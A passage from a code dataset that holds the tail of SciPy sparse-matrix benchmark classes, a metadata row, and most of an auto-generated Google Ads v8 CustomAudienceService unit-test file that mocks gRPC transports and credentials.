['__add__', '__sub__', 'multiply', '__mul__']
]
def setup(self, format, XY, op):
matrices = dict(A=poisson2d(250, format=format),
B=poisson2d(250, format=format)**2)
x = matrices[XY[0]]
self.y = matrices[XY[1]]
self.fn = getattr(x, op)
self.fn(self.y) # warmup
def time_arithmetic(self, format, XY, op):
self.fn(self.y)
class Sort(Benchmark):
params = ['Rand10', 'Rand25', 'Rand50', 'Rand100', 'Rand200']
param_names = ['matrix']
def setup(self, matrix):
n = 10000
if matrix.startswith('Rand'):
k = int(matrix[4:])
self.A = random_sparse(n, n, k)
self.A.has_sorted_indices = False
self.A.indices[:2] = 2, 1
else:
raise NotImplementedError()
def time_sort(self, matrix):
"""sort CSR column indices"""
self.A.sort_indices()
class Matvec(Benchmark):
params = [
['Identity', 'Poisson5pt', 'Block2x2', 'Block3x3'],
['dia', 'csr', 'csc', 'dok', 'lil', 'coo', 'bsr']
]
param_names = ['matrix', 'format']
def setup(self, matrix, format):
if matrix == 'Identity':
if format in ('lil', 'dok'):
raise NotImplementedError()
self.A = sparse.eye(10000, 10000, format=format)
elif matrix == 'Poisson5pt':
self.A = poisson2d(300, format=format)
elif matrix == 'Block2x2':
if format not in ('csr', 'bsr'):
raise NotImplementedError()
b = (2, 2)
self.A = sparse.kron(poisson2d(150),
ones(b)).tobsr(blocksize=b).asformat(format)
elif matrix == 'Block3x3':
if format not in ('csr', 'bsr'):
raise NotImplementedError()
b = (3, 3)
self.A = sparse.kron(poisson2d(100),
ones(b)).tobsr(blocksize=b).asformat(format)
else:
raise NotImplementedError()
self.x = ones(self.A.shape[1], dtype=float)
def time_matvec(self, matrix, format):
self.A * self.x
class Matvecs(Benchmark):
params = ['dia', 'coo', 'csr', 'csc', 'bsr']
param_names = ["format"]
def setup(self, format):
self.A = poisson2d(300, format=format)
self.x = ones((self.A.shape[1], 10), dtype=self.A.dtype)
def time_matvecs(self, format):
self.A * self.x
class Matmul(Benchmark):
def setup(self):
H1, W1 = 1, 100000
H2, W2 = W1, 1000
C1 = 10
C2 = 1000000
random.seed(0)
matrix1 = lil_matrix(zeros((H1, W1)))
matrix2 = lil_matrix(zeros((H2, W2)))
for i in range(C1):
matrix1[random.randint(H1), random.randint(W1)] = random.rand()
for i in range(C2):
matrix2[random.randint(H2), random.randint(W2)] = random.rand()
self.matrix1 = matrix1.tocsr()
self.matrix2 = matrix2.tocsr()
def time_large(self):
for i in range(100):
self.matrix1 * self.matrix2
class Construction(Benchmark):
params = [
['Empty', 'Identity', 'Poisson5pt'],
['lil', 'dok']
]
param_names = ['matrix', 'format']
def setup(self, name, format):
if name == 'Empty':
self.A = coo_matrix((10000, 10000))
elif name == 'Identity':
self.A = sparse.eye(10000, format='coo')
else:
self.A = poisson2d(100, format='coo')
formats = {'lil': lil_matrix, 'dok': dok_matrix}
self.cls = formats[format]
def time_construction(self, name, format):
T = self.cls(self.A.shape)
for i, j, v in zip(self.A.row, self.A.col, self.A.data):
T[i, j] = v
class Conversion(Benchmark):
params = [
['csr', 'csc', 'coo', 'dia', 'lil', 'dok'],
['csr', 'csc', 'coo', 'dia', 'lil', 'dok'],
]
param_names = ['from_format', 'to_format']
def setup(self, fromfmt, tofmt):
base = poisson2d(100, format=fromfmt)
try:
self.fn = getattr(base, 'to' + tofmt)
except:
def fn():
raise RuntimeError()
self.fn = fn
def time_conversion(self, fromfmt, tofmt):
self.fn()
class Getset(Benchmark):
params = [
[1, 10, 100, 1000, 10000],
['different', 'same'],
['csr', 'csc', 'lil', 'dok']
]
param_names = ['N', 'sparsity pattern', 'format']
unit = "seconds"
def setup(self, N, sparsity_pattern, format):
if format == 'dok' and N > 500:
raise NotImplementedError()
self.A = rand(1000, 1000, density=1e-5)
A = self.A
N = int(N)
# indices to assign to
i, j = [], []
while len(i) < N:
n = N - len(i)
ip = numpy.random.randint(0, A.shape[0], size=n)
jp = numpy.random.randint(0, A.shape[1], size=n)
i = numpy.r_[i, ip]
j = numpy.r_[j, jp]
v = numpy.random.rand(n)
if N == 1:
i = int(i)
j = int(j)
v = float(v)
base = A.asformat(format)
self.m = base.copy()
self.i = i
self.j = j
self.v = v
def _timeit(self, kernel, recopy):
min_time = 1e99
if not recopy:
kernel(self.m, self.i, self.j, self.v)
number = 1
start = time.time()
while time.time() - start < 0.1:
if recopy:
m = self.m.copy()
else:
m = self.m
while True:
duration = timeit.timeit(
lambda: kernel(m, self.i, self.j, self.v), number=number)
if duration > 1e-5:
break
else:
number *= 10
min_time = min(min_time, duration/number)
return min_time
def track_fancy_setitem(self, N, sparsity_pattern, format):
def kernel(A, i, j, v):
A[i, j] = v
with warnings.catch_warnings():
warnings.simplefilter('ignore', SparseEfficiencyWarning)
return self._timeit(kernel, sparsity_pattern == 'different')
def time_fancy_getitem(self, N, sparsity_pattern, format):
self.m[self.i, self.j]
class NullSlice(Benchmark):
params = [[0.05, 0.01], ['csr', 'csc', 'lil']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 100000
k = 1000
self.X = sparse.rand(n, k, format=format, density=density)
def time_getrow(self, density, format):
self.X.getrow(100)
def time_getcol(self, density, format):
self.X.getcol(100)
def time_3_rows(self, density, format):
self.X[[0, 100, 105], :]
def time_10000_rows(self, density, format):
self.X[np.arange(10000), :]
def time_3_cols(self, density, format):
self.X[:, [0, 100, 105]]
def time_100_cols(self, density, format):
self.X[:, np.arange(100)]
class Diagonal(Benchmark):
params = [[0.01, 0.1, 0.5], ['csr', 'csc', 'coo', 'lil', 'dok', 'dia']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 1000
if format == 'dok' and n * density >= 500:
raise NotImplementedError()
self.X = sparse.rand(n, n, format=format, density=density)
def time_diagonal(self, density, format):
self.X.diagonal()
class Sum(Benchmark):
params = [[0.01, 0.1, 0.5], ['csr', 'csc', 'coo', 'lil', 'dok', 'dia']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 1000
if format == 'dok' and n * density >= 500:
raise NotImplementedError()
self.X = sparse.rand(n, n, format=format, density=density)
def time_sum(self, density, format):
self.X.sum()
def time_sum_axis0(self, density, format):
self.X.sum(axis=0)
def time_sum_axis1(self, density, format):
self.X.sum(axis=1)
class Iteration(Benchmark):
params = [[0.05, 0.01], ['csr', 'csc', 'lil']]
param_names = ['density', 'format']
def setup(self, density, format):
n = 500
k = 1000
self.X = sparse.rand(n, k, format=format, density=density)
def time_iteration(self, density, format):
for row in self.X:
pass
| bsd-3-clause | 3,352,419,571,991,209,000 | 27.019499 | 77 | 0.532856 | false | 3.363089 | false | false | false |
googleapis/googleapis-gen | google/ads/googleads/v8/googleads-py/tests/unit/gapic/googleads.v8/services/test_custom_audience_service.py | 1 | 35288 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from unittest import mock
import grpc
import math
import pytest
from proto.marshal.rules.dates import DurationRule, TimestampRule
from google.ads.googleads.v8.enums.types import custom_audience_member_type
from google.ads.googleads.v8.enums.types import custom_audience_status
from google.ads.googleads.v8.enums.types import custom_audience_type
from google.ads.googleads.v8.resources.types import custom_audience
from google.ads.googleads.v8.services.services.custom_audience_service import CustomAudienceServiceClient
from google.ads.googleads.v8.services.services.custom_audience_service import transports
from google.ads.googleads.v8.services.types import custom_audience_service
from google.api_core import client_options
from google.api_core import gapic_v1
from google.api_core import grpc_helpers
from google.auth import credentials as ga_credentials
from google.auth.exceptions import MutualTLSChannelError
from google.oauth2 import service_account
from google.protobuf import field_mask_pb2 # type: ignore
import google.auth
def client_cert_source_callback():
return b"cert bytes", b"key bytes"
# If default endpoint is localhost, then default mtls endpoint will be the same.
# This method modifies the default endpoint so the client can produce a different
# mtls endpoint for endpoint testing purposes.
def modify_default_endpoint(client):
return "foo.googleapis.com" if ("localhost" in client.DEFAULT_ENDPOINT) else client.DEFAULT_ENDPOINT
def test__get_default_mtls_endpoint():
api_endpoint = "example.googleapis.com"
api_mtls_endpoint = "example.mtls.googleapis.com"
sandbox_endpoint = "example.sandbox.googleapis.com"
sandbox_mtls_endpoint = "example.mtls.sandbox.googleapis.com"
non_googleapi = "api.example.com"
assert CustomAudienceServiceClient._get_default_mtls_endpoint(None) is None
assert CustomAudienceServiceClient._get_default_mtls_endpoint(api_endpoint) == api_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(api_mtls_endpoint) == api_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(sandbox_endpoint) == sandbox_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(sandbox_mtls_endpoint) == sandbox_mtls_endpoint
assert CustomAudienceServiceClient._get_default_mtls_endpoint(non_googleapi) == non_googleapi
def test_custom_audience_service_client_from_service_account_info():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_info') as factory:
factory.return_value = creds
info = {"valid": True}
client = CustomAudienceServiceClient.from_service_account_info(info)
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_custom_audience_service_client_from_service_account_file():
creds = ga_credentials.AnonymousCredentials()
with mock.patch.object(service_account.Credentials, 'from_service_account_file') as factory:
factory.return_value = creds
client = CustomAudienceServiceClient.from_service_account_file("dummy/file/path.json")
assert client.transport._credentials == creds
client = CustomAudienceServiceClient.from_service_account_json("dummy/file/path.json")
assert client.transport._credentials == creds
assert client.transport._host == 'googleads.googleapis.com:443'
def test_custom_audience_service_client_get_transport_class():
transport = CustomAudienceServiceClient.get_transport_class()
assert transport == transports.CustomAudienceServiceGrpcTransport
transport = CustomAudienceServiceClient.get_transport_class("grpc")
assert transport == transports.CustomAudienceServiceGrpcTransport
@mock.patch.object(CustomAudienceServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CustomAudienceServiceClient))
def test_custom_audience_service_client_client_options():
# Check that if channel is provided we won't create a new one.
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.CustomAudienceServiceClient.get_transport_class') as gtc:
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials()
)
client = CustomAudienceServiceClient(transport=transport)
gtc.assert_not_called()
# Check that if channel is provided via str we will create a new one.
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.CustomAudienceServiceClient.get_transport_class') as gtc:
client = CustomAudienceServiceClient(transport="grpc")
gtc.assert_called()
# Check the case api_endpoint is provided.
options = client_options.ClientOptions(api_endpoint="squid.clam.whelk")
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient(client_options=options)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT
# is "never".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "never"}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT is
# "always".
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "always"}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_MTLS_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case api_endpoint is not provided and GOOGLE_API_USE_MTLS_ENDPOINT has
# unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "Unsupported"}):
with pytest.raises(MutualTLSChannelError):
client = CustomAudienceServiceClient()
# Check the case GOOGLE_API_USE_CLIENT_CERTIFICATE has unsupported value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": "Unsupported"}):
with pytest.raises(ValueError):
client = CustomAudienceServiceClient()
@mock.patch.object(CustomAudienceServiceClient, "DEFAULT_ENDPOINT", modify_default_endpoint(CustomAudienceServiceClient))
@mock.patch.dict(os.environ, {"GOOGLE_API_USE_MTLS_ENDPOINT": "auto"})
@pytest.mark.parametrize("use_client_cert_env", ["true", "false"])
def test_custom_audience_service_client_mtls_env_auto(use_client_cert_env):
# This tests the endpoint autoswitch behavior. Endpoint is autoswitched to the default
# mtls endpoint, if GOOGLE_API_USE_CLIENT_CERTIFICATE is "true" and client cert exists.
# Check the case client_cert_source is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
options = client_options.ClientOptions(client_cert_source=client_cert_source_callback)
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
ssl_channel_creds = mock.Mock()
with mock.patch('grpc.ssl_channel_credentials', return_value=ssl_channel_creds):
grpc_transport.return_value = None
client = CustomAudienceServiceClient(client_options=options)
if use_client_cert_env == "false":
expected_ssl_channel_creds = None
expected_host = client.DEFAULT_ENDPOINT
else:
expected_ssl_channel_creds = ssl_channel_creds
expected_host = client.DEFAULT_MTLS_ENDPOINT
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case ADC client cert is provided. Whether client cert is used depends on
# GOOGLE_API_USE_CLIENT_CERTIFICATE value.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
with mock.patch('google.auth.transport.grpc.SslCredentials.ssl_credentials', new_callable=mock.PropertyMock) as ssl_credentials_mock:
if use_client_cert_env == "false":
is_mtls_mock.return_value = False
ssl_credentials_mock.return_value = None
expected_host = client.DEFAULT_ENDPOINT
expected_ssl_channel_creds = None
else:
is_mtls_mock.return_value = True
ssl_credentials_mock.return_value = mock.Mock()
expected_host = client.DEFAULT_MTLS_ENDPOINT
expected_ssl_channel_creds = ssl_credentials_mock.return_value
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=expected_ssl_channel_creds,
credentials=None,
host=expected_host,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
# Check the case client_cert_source and ADC client cert are not provided.
with mock.patch.dict(os.environ, {"GOOGLE_API_USE_CLIENT_CERTIFICATE": use_client_cert_env}):
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
with mock.patch('google.auth.transport.grpc.SslCredentials.__init__', return_value=None):
with mock.patch('google.auth.transport.grpc.SslCredentials.is_mtls', new_callable=mock.PropertyMock) as is_mtls_mock:
is_mtls_mock.return_value = False
grpc_transport.return_value = None
client = CustomAudienceServiceClient()
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host=client.DEFAULT_ENDPOINT,
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_custom_audience_service_client_client_options_from_dict():
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceGrpcTransport.__init__') as grpc_transport:
grpc_transport.return_value = None
client = CustomAudienceServiceClient(
client_options={'api_endpoint': 'squid.clam.whelk'}
)
grpc_transport.assert_called_once_with(
ssl_channel_credentials=None,
credentials=None,
host="squid.clam.whelk",
client_info=transports.base.DEFAULT_CLIENT_INFO,
)
def test_get_custom_audience(transport: str = 'grpc', request_type=custom_audience_service.GetCustomAudienceRequest):
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_custom_audience),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience.CustomAudience(
resource_name='resource_name_value',
id=205,
status=custom_audience_status.CustomAudienceStatusEnum.CustomAudienceStatus.UNKNOWN,
name='name_value',
type_=custom_audience_type.CustomAudienceTypeEnum.CustomAudienceType.UNKNOWN,
description='description_value',
)
response = client.get_custom_audience(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == custom_audience_service.GetCustomAudienceRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, custom_audience.CustomAudience)
assert response.resource_name == 'resource_name_value'
assert response.id == 205
assert response.status == custom_audience_status.CustomAudienceStatusEnum.CustomAudienceStatus.UNKNOWN
assert response.name == 'name_value'
assert response.type_ == custom_audience_type.CustomAudienceTypeEnum.CustomAudienceType.UNKNOWN
assert response.description == 'description_value'
def test_get_custom_audience_from_dict():
test_get_custom_audience(request_type=dict)
def test_get_custom_audience_field_headers():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = custom_audience_service.GetCustomAudienceRequest()
request.resource_name = 'resource_name/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_custom_audience),
'__call__') as call:
call.return_value = custom_audience.CustomAudience()
client.get_custom_audience(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'resource_name=resource_name/value',
) in kw['metadata']
def test_get_custom_audience_flattened():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_custom_audience),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience.CustomAudience()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_custom_audience(
resource_name='resource_name_value',
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].resource_name == 'resource_name_value'
def test_get_custom_audience_flattened_error():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_custom_audience(
custom_audience_service.GetCustomAudienceRequest(),
resource_name='resource_name_value',
)
def test_mutate_custom_audiences(transport: str = 'grpc', request_type=custom_audience_service.MutateCustomAudiencesRequest):
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_custom_audiences),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience_service.MutateCustomAudiencesResponse(
)
response = client.mutate_custom_audiences(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == custom_audience_service.MutateCustomAudiencesRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, custom_audience_service.MutateCustomAudiencesResponse)
def test_mutate_custom_audiences_from_dict():
test_mutate_custom_audiences(request_type=dict)
def test_mutate_custom_audiences_field_headers():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = custom_audience_service.MutateCustomAudiencesRequest()
request.customer_id = 'customer_id/value'
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_custom_audiences),
'__call__') as call:
call.return_value = custom_audience_service.MutateCustomAudiencesResponse()
client.mutate_custom_audiences(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
'x-goog-request-params',
'customer_id=customer_id/value',
) in kw['metadata']
def test_mutate_custom_audiences_flattened():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.mutate_custom_audiences),
'__call__') as call:
# Designate an appropriate return value for the call.
call.return_value = custom_audience_service.MutateCustomAudiencesResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.mutate_custom_audiences(
customer_id='customer_id_value',
operations=[custom_audience_service.CustomAudienceOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0].customer_id == 'customer_id_value'
assert args[0].operations == [custom_audience_service.CustomAudienceOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))]
def test_mutate_custom_audiences_flattened_error():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.mutate_custom_audiences(
custom_audience_service.MutateCustomAudiencesRequest(),
customer_id='customer_id_value',
operations=[custom_audience_service.CustomAudienceOperation(update_mask=field_mask_pb2.FieldMask(paths=['paths_value']))],
)
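# Sketch of non-mocked usage (credentials, IDs and the operation payload below
# are placeholders; a real call also requires valid Google Ads developer
# credentials):
#   client = CustomAudienceServiceClient(credentials=real_credentials)
#   audience = client.get_custom_audience(
#       resource_name='customers/1234567890/customAudiences/111')
#   response = client.mutate_custom_audiences(
#       customer_id='1234567890',
#       operations=[custom_audience_service.CustomAudienceOperation(...)])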
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = CustomAudienceServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.CustomAudienceServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.CustomAudienceServiceGrpcTransport,
)
@pytest.mark.parametrize("transport_class", [
transports.CustomAudienceServiceGrpcTransport,
])
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
def test_custom_audience_service_base_transport():
# Instantiate the base transport.
with mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceTransport.__init__') as Transport:
Transport.return_value = None
transport = transports.CustomAudienceServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
'get_custom_audience',
'mutate_custom_audiences',
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
def test_custom_audience_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, 'default') as adc, mock.patch('google.ads.googleads.v8.services.services.custom_audience_service.transports.CustomAudienceServiceTransport._prep_wrapped_messages') as Transport:
Transport.return_value = None
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.CustomAudienceServiceTransport()
adc.assert_called_once()
def test_custom_audience_service_auth_adc():
# If no credentials are provided, we should use ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
CustomAudienceServiceClient()
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_custom_audience_service_transport_auth_adc():
# If credentials and host are not provided, the transport class should use
# ADC credentials.
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transports.CustomAudienceServiceGrpcTransport(host="squid.clam.whelk")
adc.assert_called_once_with(scopes=(
'https://www.googleapis.com/auth/adwords',
))
def test_custom_audience_service_host_no_port():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com'),
)
assert client.transport._host == 'googleads.googleapis.com:443'
def test_custom_audience_service_host_with_port():
client = CustomAudienceServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
client_options=client_options.ClientOptions(api_endpoint='googleads.googleapis.com:8000'),
)
assert client.transport._host == 'googleads.googleapis.com:8000'
def test_custom_audience_service_grpc_transport_channel():
channel = grpc.insecure_channel('http://localhost/')
# Check that channel is used if provided.
transport = transports.CustomAudienceServiceGrpcTransport(
host="squid.clam.whelk",
channel=channel,
)
assert transport.grpc_channel == channel
assert transport._host == "squid.clam.whelk:443"
assert transport._ssl_channel_credentials == None
@pytest.mark.parametrize("transport_class", [transports.CustomAudienceServiceGrpcTransport])
def test_custom_audience_service_transport_channel_mtls_with_client_cert_source(
transport_class
):
with mock.patch("grpc.ssl_channel_credentials", autospec=True) as grpc_ssl_channel_cred:
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_ssl_cred = mock.Mock()
grpc_ssl_channel_cred.return_value = mock_ssl_cred
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
cred = ga_credentials.AnonymousCredentials()
with pytest.warns(DeprecationWarning):
with mock.patch.object(google.auth, 'default') as adc:
adc.return_value = (cred, None)
transport = transport_class(
host="squid.clam.whelk",
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=client_cert_source_callback,
)
adc.assert_called_once()
grpc_ssl_channel_cred.assert_called_once_with(
certificate_chain=b"cert bytes", private_key=b"key bytes"
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
assert transport._ssl_channel_credentials == mock_ssl_cred
@pytest.mark.parametrize("transport_class", [transports.CustomAudienceServiceGrpcTransport,])
def test_custom_audience_service_transport_channel_mtls_with_adc(
transport_class
):
mock_ssl_cred = mock.Mock()
with mock.patch.multiple(
"google.auth.transport.grpc.SslCredentials",
__init__=mock.Mock(return_value=None),
ssl_credentials=mock.PropertyMock(return_value=mock_ssl_cred),
):
with mock.patch.object(transport_class, "create_channel", autospec=True) as grpc_create_channel:
mock_grpc_channel = mock.Mock()
grpc_create_channel.return_value = mock_grpc_channel
mock_cred = mock.Mock()
with pytest.warns(DeprecationWarning):
transport = transport_class(
host="squid.clam.whelk",
credentials=mock_cred,
api_mtls_endpoint="mtls.squid.clam.whelk",
client_cert_source=None,
)
grpc_create_channel.assert_called_once_with(
"mtls.squid.clam.whelk:443",
credentials=mock_cred,
credentials_file=None,
scopes=(
'https://www.googleapis.com/auth/adwords',
),
ssl_credentials=mock_ssl_cred,
quota_project_id=None,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
assert transport.grpc_channel == mock_grpc_channel
def test_custom_audience_path():
customer_id = "squid"
custom_audience_id = "clam"
expected = "customers/{customer_id}/customAudiences/{custom_audience_id}".format(customer_id=customer_id, custom_audience_id=custom_audience_id, )
actual = CustomAudienceServiceClient.custom_audience_path(customer_id, custom_audience_id)
assert expected == actual
def test_parse_custom_audience_path():
expected = {
"customer_id": "whelk",
"custom_audience_id": "octopus",
}
path = CustomAudienceServiceClient.custom_audience_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_custom_audience_path(path)
assert expected == actual
def test_common_billing_account_path():
billing_account = "oyster"
expected = "billingAccounts/{billing_account}".format(billing_account=billing_account, )
actual = CustomAudienceServiceClient.common_billing_account_path(billing_account)
assert expected == actual
def test_parse_common_billing_account_path():
expected = {
"billing_account": "nudibranch",
}
path = CustomAudienceServiceClient.common_billing_account_path(**expected)
# Check that the path construction is reversible.
actual = CustomAudienceServiceClient.parse_common_billing_account_path(path)
